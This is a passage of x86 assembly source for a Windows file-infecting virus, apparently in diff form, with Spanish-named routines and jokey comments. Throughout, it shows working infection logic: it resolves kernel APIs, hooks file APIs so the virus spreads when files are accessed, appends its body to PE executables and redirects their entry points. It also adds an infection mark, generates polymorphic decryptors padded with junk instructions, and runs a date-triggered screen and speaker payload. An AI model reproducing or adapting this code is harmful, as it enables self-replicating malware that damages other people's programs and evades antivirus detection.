Function to Close a Handle (A=Don't Truncate File) * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +CloseHandleA proc + push eax + call [@_CloseHandle+ebp] ; Just Close a Handle + ret +CloseHandleA endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Close a Handle (B=Truncate File) * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +CloseHandleB proc + push esi + mov esi,eax + lea eax,[DatosArchivo.LastWriteTime+ebp] ; Replace LastWriteTime of File + push eax + xor eax,eax + push eax + push eax + push esi + call [@_SetFileTime+ebp] ; And make the change effective + push esi + call [@_CloseHandle+ebp] ; Close File Handle and replace + push [H_AtributosFile+ebp] ; the original File Attributes + lea eax,[DatosArchivo.FileName+ebp] + push eax + call [@_SetFileAttributesA+ebp] + pop esi + ret +CloseHandleB endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to copy Virus in the New Host * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +CopiarHostNuevo proc + mov edi,[@_DirArchivo+ebp] ; Set edi and esi to make the Virus Body Copy + add edi,[esi+14h] + add edi,ebx + lea esi,[V_InicioVirus+ebp] + mov ecx,TamVirus@2 ; Move the Total Size of Virus + push esi + push edi + rep movsb ; Well, move all... hahaha + pop edi + pop esi + mov ecx,edi + mov eax,[H_Delta+ebp] ; Before Encript set some internal values + add ecx,offset V_Delta - offset V_InicioVirus + mov [ecx],eax ; Like Delta, Rva to Virus, Rva to Host and + mov eax,[H_RvaVirus+ebp] ; the Month Date for payload activation + add ecx,offset V_RvaVirus - offset V_Delta + mov [ecx],eax + mov eax,[H_RvaHost+ebp] + add ecx,offset V_RvaHost - offset V_RvaVirus + mov [ecx],eax + mov ax,[SysDate.Mes+ebp] + add ecx,offset V_MesVirus - offset V_RvaHost + mov [ecx],ax ; That's all for now! + ret +CopiarHostNuevo endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Open Files * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +CreateFile proc + push esi + call [@_GetFileAttributesA+ebp] ; Get the original File Attributes + inc eax + jz CreateFileError@1 ; If error -> don't open file + dec eax + mov [H_AtributosFile+ebp],eax ; And make File Attributes Normal Archive + push 00000080h + push esi + call [@_SetFileAttributesA+ebp] ; Make effective the change + or eax,eax + jz CreateFileError@1 + xor eax,eax ; push some typical values + push eax + push eax + push 03h ; Open existing File + push eax + inc eax + push eax + push 0C0000000h ; Read and Write Access + push esi + call [@_CreateFileA+ebp] ; And Create the File that our baby want... + ret +CreateFileError@1: + dec eax ; If Error -> Return zero + ret +CreateFile endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Unprotect a Memory Section * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +DesprotegerMemoria proc + push TamInfo + lea eax,[InfoMemoria+ebp] ; Get the Memory Section Info + push eax + push ebx + call [@_VirtualQuery+ebp] ; How are you? + or eax,eax + jz DesprotegerError@1 ; Humm, error?... don't change then + lea eax,[InfoMemoria.Protect+ebp] ; Fine... Make the Section Writeable + push eax + push 04h + push dword ptr[InfoMemoria.RegionSize+ebp] + push dword ptr[InfoMemoria.BaseAddress+ebp] + call [@_VirtualProtect+ebp] ; Now, we can write in Import Section +DesprotegerError@1: + ret +DesprotegerMemoria endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to encript Virus Body in New Host * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +EncriptarHostNuevo proc + call NuevoDesencriptar ; First we create a new Decriptor Routine + add edi,offset V_Virus - offset V_InicioVirus + imul eax,eax,04h ; And Change the Encription Routine + lea esi,[V_Encriptores+ebp] + add esi,eax ; Move the New Instructions + lodsd + lea edx,[V_BucleEncriptar+ebp] ; Set Destination and Origin of the Copy + mov [edx],eax + mov edx,TamVirus@1 +V_BucleEncriptar: ; And copy the Encripted Virus + rol byte ptr[edi],cl ; This instructions change in execution with + xor byte ptr[edi],cl ; the correct ones (acording to the generated + inc edi ; Decription Routine) + ror ecx,08h + dec edx + jnz V_BucleEncriptar + ret ; Bye! +EncriptarHostNuevo endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to create a File Map * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +FileMapping proc + xor eax,eax ; Just push some typical values and call + push eax ; the CreateFileMappingA API + push edi + push esi + push 04h ; Page with Read and Write + push eax + push ebx + call [@_CreateFileMappingA+ebp] ; Create the File Mapping + ret +FileMapping endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to get an API Address * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +FullApiAddress proc +FullApi@1: + push edi ; Save some registers + push esi + call [@_GetProcAddress+ebp] ; We need some API address... + or eax,eax ; Give me the APIs!!! haha + jz FullApiError@1 + mov [ebx],eax ; If no error we have one... save it + add ebx,04h ; And move pointer to get the next one + xor al,al +FullApi@2: + scasb ; Next API Name...and go back + jnz FullApi@2 + cmp byte ptr[edi],0BBh + jnz FullApi@1 ; If Finish... job done + xor eax,eax ; Well... non zero -> all under control + inc eax + ret +FullApiError@1: + xor eax,eax ; Zero -> something fails... abort! + ret +FullApiAddress endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Get all APIs that we need * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +GetApiAddress proc + mov ebx,[eax+3Ch] ; We are in the Kernel Base... + add eax,ebx + mov bx,[eax] + cmp bx,'EP' ; And have now the Portable Exe Header pointer + jnz GetApiError@1 + mov ebx,[eax+78h] + mov eax,[@_KernelAddress+ebp] + mov edx,eax + add eax,ebx + mov ecx,edx + mov ebx,[eax+1Ch] ; Now we need to know where are AddressTable, + add ebx,ecx ; NameTable and Ordinal Table... + mov [@_AddressTable+ebp],ebx + mov ebx,[eax+20h] + add ebx,ecx + mov [@_NameTable+ebp],ebx ; And get the address + mov ebx,[eax+24h] + add ebx,ecx + mov [@_OrdinalTable+ebp],ebx + xor ebx,ebx + mov esi,[@_NameTable+ebp] +GetApi@2: + lodsd ; Well... try to Find the GetProcAddress + add eax,edx ; String for Virus + mov ecx,[eax] + cmp ecx,'PteG' + jnz GetApi@1 + mov ecx,[eax+04h] + cmp ecx,'Acor' + jnz GetApi@1 + mov ecx,[eax+08h] + cmp ecx,'erdd' + jnz GetApi@1 + jmp GetApi@3 ; Great! we have found the API string! +GetApi@1: + inc ebx + jmp GetApi@2 +GetApi@3: + shl ebx,01h ; Get the API Ordinal... + add ebx,[@_OrdinalTable+ebp] + movzx eax,word ptr[ebx] + shl eax,02h + add eax,[@_AddressTable+ebp] ; ... with the address of API pointer + mov ebx,[eax] + add ebx,edx ; And finaly we have the API actual address + mov [@_GetProcAddress+ebp],ebx + mov esi,edx + lea ebx,[V_Direcciones@1+ebp] ; Time to get all API we need... + lea edi,[V_Nombres@1+ebp] ; Set some pointers to Strings and Addresses + call FullApiAddress ; Fill in with this process all + or eax,eax + jz GetApiError@1 + xor eax,eax ; No error -> non Zero value + inc eax + ret +GetApiError@1: + xor eax,eax ; Zero -> arghh... shit! an error + ret +GetApiAddress endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Get the Kernel Base * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +GetKernelAddress proc + mov eax,[esp+2Ch] ; Look on the Stack and get the CreateProcess + and eax,0FFFF0000h ; address... and go down until we get the + mov ecx,05h ; famous MZ signature... +GetKernel@1: + mov bx,[eax] + cmp bx,'ZM' + jz GetKernel@2 ; hahaha... The Kernel Address! + sub eax,00010000h ; Nop! go down + loop GetKernel@1 + xor eax,eax ; Error -> eax zero +GetKernel@2: + mov [@_KernelAddress+ebp],eax ; We have now the Kernel Base Address! + ret +GetKernelAddress endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to make a random number with a Range * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +GetRndRange proc + push ecx ; Save some registers + push edx + mov ecx,eax + call Random ; Call Random Function + xor edx,edx ; Make a number in the Range + div ecx + mov eax,edx ; And we have a random number in eax + pop edx + pop ecx + ret +GetRndRange endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Hook of CopyFileA API * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +HookCopyFileA proc + pushad ; Save Registers + pushfd + mov ebp,00h ; Recuperate the Delta Offset +V_DeltaHook equ $-4 + call BuscarArchivos ; And Find some Files in the actual Path + popfd + popad + push 5A5A5A5Ah ; Finaly jump to the real API +V_JumpHook equ $-4 + ret +HookCopyFileA endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Hook of CreateFileA API * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +HookCreateFileA proc + pushad ; Save Registers + pushfd + mov ebp,00h ; Recuperate the Delta Offset + call BuscarArchivos ; And Find some Files in the actual Path + popfd + popad + push 5A5A5A5Ah ; Finaly jump to the real API + ret +HookCreateFileA endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Hook of DeleteFileA API * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +HookDeleteFileA proc + pushad ; Save Registers + pushfd + mov ebp,00h ; Recuperate the Delta Offset + call BuscarArchivos ; And Find some Files in the actual Path + popfd + popad + push 5A5A5A5Ah ; Finaly jump to the real API + ret +HookDeleteFileA endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Hook of FindFirstFileA API * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +HookFindFirstFileA proc + pushad ; Save Registers + pushfd + mov ebp,00h ; Recuperate the Delta Offset + call BuscarArchivos ; And Find some Files in the actual Path + popfd + popad + push 5A5A5A5Ah ; Finaly jump to the real API + ret +HookFindFirstFileA endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Hook of FindNextFileA API * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +HookFindNextFileA proc + pushad ; Save Registers + pushfd + mov ebp,00h ; Recuperate the Delta Offset + call BuscarArchivos ; And Find some Files in the actual Path + popfd + popad + push 5A5A5A5Ah ; Finaly jump to the real API + ret +HookFindNextFileA endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Hook of GetModuleHandleA API * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +HookGetModuleHandleA proc + pushad ; Save Registers + pushfd + mov ebp,00h ; Recuperate the Delta Offset + call BuscarArchivos ; And Find some Files in the actual Path + popfd + popad + push 5A5A5A5Ah ; Finaly jump to the real API + ret +HookGetModuleHandleA endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Hook of MoveFileA API * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +HookMoveFileA proc + pushad ; Save Registers + pushfd + mov ebp,00h ; Recuperate the Delta Offset + call BuscarArchivos ; And Find some Files in the actual Path + popfd + popad + push 5A5A5A5Ah ; Finaly jump to the real API + ret +HookMoveFileA endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Infect a New Host * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +InfectarArchivo proc + push edi ; Save registers + push esi + mov eax,[DatosArchivo.FileSizeLow+ebp] ; Add to File Size the Virus Size + mov esi,[DatosArchivo.FileSizeHigh+ebp] ; and Align it with Section Alignment + add eax,TamVirus@2 + call AlinearCifra + mov ecx,75h ; Make the Mapping Size a multiple + xor edx,edx ; of 75h (Size Padding) + push eax + div ecx + pop eax + sub ecx,edx + add eax,ecx + mov edi,eax + mov [H_TamHostVirus+ebp],eax ; Save this Value + mov ebx,[H_HandleOpen+ebp] + call FileMapping ; And ReMap the File... + or eax,eax + jz InfectarArchivoError@1 ; Error... Truncate and Close File + mov [H_HandleMapa+ebp],eax + mov ebx,eax + call MapViewFile ; Create the extended File Mapping + or eax,eax + jz InfectarArchivoError@2 + mov [@_DirArchivo+ebp],eax + call ModificarHostNuevo ; Change some headers values of + or eax,eax ; the New Host + jz InfectarArchivoError@3 ; If error Truncate and go out! + call CopiarHostNuevo ; Copy the Virus Body to New Host, + call EncriptarHostNuevo ; generate a new Decriptor and + mov esi,[@_DirArchivo+ebp] ; encript the Virus + call CheckSumValido ; If the Host had a CheckSum + or eax,eax ; go and recalculate it + jz InfectarArchivoError@4 + mov ecx,[H_TamHostVirus+ebp] + call CheckSumMappedFile +InfectarArchivoError@4: + mov ebx,esi + call UnmapFile ; Unmap File, Close Handle... + mov eax,[H_HandleMapa+ebp] ; Well... the same stuff + call CloseHandleA + mov ebx,[H_TamHostVirus+ebp] + call TruncarHostNuevo + mov eax,[H_HandleOpen+ebp] + call CloseHandleB + pop esi + pop edi + xor eax,eax ; All terminated well -> eax non zero + inc eax + ret +InfectarArchivoError@3: + mov ebx,[@_DirArchivo+ebp] ; Unmap, Close, Truncate and Close... + call UnmapFile +InfectarArchivoError@2: + mov eax,[H_HandleMapa+ebp] + call CloseHandleA + mov ebx,[DatosArchivo.FileSizeLow+ebp] + call TruncarHostNuevo ; If we have an error, truncate the +InfectarArchivoError@1: ; New Host with his real size + mov eax,[H_HandleOpen+ebp] + call CloseHandleB + pop esi + pop edi + xor eax,eax ; The File have not been infected + ret +InfectarArchivo endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to start the Random Number Generator * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +IniciarSemilla proc + call [@_GetTickCount+ebp] ; The 1st time is a good initial value + mov [H_Semilla+ebp],eax ; Save it in a Virus place + ret +IniciarSemilla endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Load New Libraries * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +LoadLibrary proc + push esi + call [@_GetModuleHandleA+ebp] ; Get the Library Address if loaded yet + or eax,eax + jnz LoadLibrary@1 + push esi + call [@_LoadLibraryA+ebp] ; If not loaded... we load it now! +LoadLibrary@1: + ret +LoadLibrary endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Load SfcIsFileProtected API * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +LoadSfcProtected proc + lea esi,[N_SfcLib+ebp] + call LoadLibrary ; Load Sfd.dll Library, please... + or eax,eax + jz LoadError@1 + mov esi,eax + lea edi,[V_Nombres@5+ebp] ; APIs names and addresses + lea ebx,[V_Direcciones@5+ebp] + call FullApiAddress ; It's time to get some APIs, hahaha + or eax,eax + jz LoadError@1 + ret +LoadError@1: + mov [@_SfcIsFileProtected+ebp],eax ; Save this address + ret +LoadSfcProtected endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Map a File in Memory * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +MapViewFile proc + xor eax,eax ; Just map the File that the Virus wants + push edi + push eax + push eax + push 000F001Fh ; With File Map All Access + push ebx + call [@_MapViewOfFile+ebp] ; Map view of New Host, please + ret +MapViewFile endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Set Some Host Header Values * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +ModificarHostNuevo proc + call CheckEntryPoint ; Check the Entry Point and save some values + or ecx,ecx + jz ModificarError@1 ; No good Host -> go out now + mov [H_RawText+ebp],ecx ; Save some addresses + mov [H_RvaText+ebp],ebx + mov [H_TextHeader+ebp],edx + mov edx,eax + add edx,[edx+3Ch] ; Time to find the last section of Host + mov esi,edx + add esi,18h + movzx ebx,word ptr[edx+14h] + add esi,ebx + movzx ecx,word ptr[edx+06h] + mov edi,esi + xor eax,eax +ModificarBucle@1: + cmp [edi+14h],eax + jna ModificarBucle@2 + mov eax,[edi+14h] ; Get the actual last section + mov esi,edi +ModificarBucle@2: + add edi,28h + loop ModificarBucle@1 + mov eax,[esi+24h] + and eax,10000000h ; Check for Shareable sections (we don't want) + jnz ModificarError@1 + mov eax,[DatosArchivo.FileSizeLow+ebp] + mov ebx,eax + shr ebx,04h + sub eax,ebx + mov ebx,[esi+14h] + add ebx,[esi+10h] + sub eax,ebx + jnc ModificarError@1 + mov eax,TamVirus@2 + mov ebx,[esi+10h] + add eax,ebx + call AlinearCifra + mov [esi+10h],eax ; Set the Section Raw Data and Virtual Size + mov [esi+08h],eax + push ebx + call PonerDirectorio ; Actualice the Directory Structure + add ebx,[esi+0Ch] + mov eax,[edx+28h] ; whohoho... Set the new Entry Point, but + mov [H_RvaHost+ebp],eax ; make it point to the code section + mov [H_RvaVirus+ebp],ebx + call SetEntryPoint + add ebx,[edx+34h] + sub ebx,offset V_InicioVirus - offset V_InicioHost + 00401000h + mov [H_Delta+ebp],ebx ; Hard-Coded Delta offset + mov eax,[esi+10h] + add eax,[esi+0Ch] + mov [edx+50h],eax ; Set a new Size of Image + or [esi+24h],0E0000020h ; Make the last Section Writeable, Executable... + mov [edx+08h],'POLT' ; Put an Infection Mark in the Host Header + lea eax,[SysDate+ebp] + push eax + call [@_GetSystemTime+ebp] ; Get the Date of Infection + pop ebx + xor eax,eax ; Great! -> non zero eax + inc eax + ret +ModificarError@1: + xor eax,eax ; Shit!... don't infect it, zero eax + ret +ModificarHostNuevo endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to generate a new Decriptor * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +NuevoDesencriptar proc + push edi + call Random ; Get a new random Value + push eax + mov ebx,eax + and eax,00000007h ; Make it 0 to 7 to select a Decriptor + push eax + imul eax,eax,1Bh + lea esi,[V_Decriptores+ebp] ; And point to the selected Decriptor + add esi,eax + mov [esi+01h],ebx ; with his new 32 bits Key + add edi,offset V_Desencriptar - offset V_InicioVirus + mov ecx,17h ; Junk counter Instructions + lodsb ; Build a new Decriptor + stosb + lodsd + stosd + call PonerBasura ; Well... some Junk Instructions, please + lodsb ; And on, and on... the same + stosb + lodsd + stosd + call PonerBasura + lodsw + stosw + lodsd + stosd + call PonerBasura + push edi ; Save the jump loop direction for later + lodsw + stosw + call PonerBasura + lodsw + stosw + call PonerBasura + lodsb + stosb + call PonerBasura + lodsw + stosw + lodsb + stosb + call PonerBasura + call RellenarBasura ; If we have more space... fill in whit junk + lodsb + stosb + lodsw + pop edx + sub edx,edi + dec edx + dec edx + mov ah,dl + stosw ; And code the last jump with his address + pop eax + pop ecx + pop edi + ret +NuevoDesencriptar endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to calculate a New Partial CheckSum * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +ParcialCheckSum proc + push esi ; This is a version of the CheckSumMappedFile + xor eax,eax ; API... to make a CRC32 of Infected Files + shl ecx,01h ; Only makes the partial Check Sum, used by + je Check@0 ; other process that calculate the final + test esi,02h ; Check Sum of Mapped File + je Check@1 + movzx edx,word ptr[esi] + add eax,edx + adc eax,00h + add esi,02h + sub ecx,02h +Check@1: + mov edx,ecx + and edx,07h + sub ecx,edx + je Check@2 + test ecx,08h + je Check@3 + add eax,[esi] + adc eax,[esi+04h] + adc eax,00h + add esi,08h + sub ecx,08h + je Check@2 +Check@3: + test ecx,10h + je Check@4 + add eax,[esi] + adc eax,[esi+04h] + adc eax,[esi+08h] + adc eax,[esi+0Ch] + adc eax,00h + add esi,10h + sub ecx,10h + je Check@2 +Check@4: + test ecx,20h + je Check@5 + add eax,[esi] + adc eax,[esi+04h] + adc eax,[esi+08h] + adc eax,[esi+0Ch] + adc eax,[esi+10h] + adc eax,[esi+14h] + adc eax,[esi+18h] + adc eax,[esi+1Ch] + adc eax,00h + add esi,20h + sub ecx,20h + je Check@2 +Check@5: + test ecx,40h + je Check@6 + add eax,[esi] + adc eax,[esi+04h] + adc eax,[esi+08h] + adc eax,[esi+0Ch] + adc eax,[esi+10h] + adc eax,[esi+14h] + adc eax,[esi+18h] + adc eax,[esi+1Ch] + adc eax,[esi+20h] + adc eax,[esi+24h] + adc eax,[esi+28h] + adc eax,[esi+2Ch] + adc eax,[esi+30h] + adc eax,[esi+34h] + adc eax,[esi+38h] + adc eax,[esi+3Ch] + adc eax,00h + add esi,40h + sub ecx,40h + je Check@2 +Check@6: + add eax,[esi] + adc eax,[esi+04h] + adc eax,[esi+08h] + adc eax,[esi+0Ch] + adc eax,[esi+10h] + adc eax,[esi+14h] + adc eax,[esi+18h] + adc eax,[esi+1Ch] + adc eax,[esi+20h] + adc eax,[esi+24h] + adc eax,[esi+28h] + adc eax,[esi+2Ch] + adc eax,[esi+30h] + adc eax,[esi+34h] + adc eax,[esi+38h] + adc eax,[esi+3Ch] + adc eax,[esi+40h] + adc eax,[esi+44h] + adc eax,[esi+48h] + adc eax,[esi+4Ch] + adc eax,[esi+50h] + adc eax,[esi+54h] + adc eax,[esi+58h] + adc eax,[esi+5Ch] + adc eax,[esi+60h] + adc eax,[esi+64h] + adc eax,[esi+68h] + adc eax,[esi+6Ch] + adc eax,[esi+70h] + adc eax,[esi+74h] + adc eax,[esi+78h] + adc eax,[esi+7Ch] + adc eax,00h + add esi,80h + sub ecx,80h + jne Check@6 +Check@2: + test edx,edx + je Check@0 +Check@7: + movzx ecx,word ptr[esi] + add eax,ecx + adc eax,00h + add esi,02h + sub edx,02h + jne Check@7 +Check@0: + mov edx,eax + shr edx,10h + and eax,0000FFFFh + add eax,edx + mov edx,eax + shr edx,10h + add eax,edx + and eax,0000FFFFh + pop esi + ret +ParcialCheckSum endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Virus Graphic Payload * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +Payload proc + xor eax,eax ; Get the Screen Handle + push eax + call [@_GetDC+ebp] + or eax,eax + jz PayloadError@1 ; If error -> Skip it! + mov [H_HandlePantalla+ebp],eax ; And save it... + mov edi,0320h ; Optimize to 800 per 600 screens + mov esi,0258h + mov ebx,07h ; Number of Rare Spots ;) +PayloadBucle@1: + call Random ; Create a Brush with a random color + and eax,00FFFFFFh + push eax + call [@_CreateSolidBrush+ebp] + push eax + push dword ptr[H_HandlePantalla+ebp] + call [@_SelectObject+ebp] ; And select it to paint...hahaha + call RunBeep ; whooaaa, wake up with the speaker!! + push ebx + mov eax,esi + call GetRndRange ; Get a random position (x,y) + mov ebx,eax ; in the actual screen (800,600) + mov eax,edi + call GetRndRange + mov ecx,eax + mov edx,ebx + push esi + mov esi,25h ; Build the area of Circle + add edx,esi + add ecx,esi + sub ebx,esi + sub eax,esi + pop esi + push edx ; Push the values + push ecx + push ebx + push eax + push dword ptr[H_HandlePantalla+ebp] + call [@_Ellipse+ebp] ; Draw a circle on the screen + pop ebx + dec ebx + jnz PayloadBucle@1 ; And go on... we want more circles! +PayloadError@1: + ret +Payload endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Virus Payload Test * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +PayloadVirus proc + lea eax,[SysDate+ebp] ; Push a pointer to a structure + push eax + call [@_GetSystemTime+ebp] ; And get the system Time + or eax,eax + jz PayloadVirusError@1 + cmp word ptr[SysDate.Dia+ebp],1Fh ; If 31th of actual month + jnz PayloadVirusError@1 + cmp word ptr[SysDate.Mes+ebp],5A5Ah ; And different than the infection +V_MesVirus equ $-2 ; month Date Mark + jz PayloadVirusError@1 + call RunPayload ; Make a presentation (hahaha XD) +PayloadVirusError@1: + ret +PayloadVirus endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to put some shit instructions in Decriptor * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +PonerBasura proc + or ecx,ecx ; Check for counter, if zero...finish + jz PonerBasuraError@1 + call Random ; get a random number + mov edx,eax + cmp ecx,03h ; At least 3 bytes in counter + jc PonerBasura@1 + bt edx,00h ; And random please + jnc PonerBasura@1 ; We could put a 3 byte instruction + lea ebx,[V_TresBytes+ebp] + movzx eax,dl + and al,1Fh + mov dl,al + shl al,01h + add al,dl + add ebx,eax + mov ax,[ebx] + stosw + mov al,[ebx+02h] + stosb ; Great!... put the instruction + dec ecx ; Decrement counter + dec ecx + dec ecx +PonerBasura@1: + cmp ecx,02h ; At least 2 bytes in counter + jc PonerBasura@2 + bt edx,08h ; And random please + jnc PonerBasura@2 ; Or a 2 byte junk instruction + lea ebx,[V_DosBytes+ebp] + movzx eax,dh + and al,1Fh + shl al,01h + add ebx,eax + mov ax,[ebx] + stosw ; Put the instruction + dec ecx ; Decrement counter + dec ecx +PonerBasura@2: + cmp ecx,01h ; At least one byte in counter + jc PonerBasuraError@1 + bt edx,10h ; We want a random form + jnc PonerBasuraError@1 ; Or a 1 byte junk instruction + lea ebx,[V_UnByte+ebp] + shr edx,10h + and dx,000Fh + add ebx,edx + mov al,[ebx] + stosb ; Storage it! + dec ecx ; And decrement the counter +PonerBasuraError@1: + ret +PonerBasura endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** 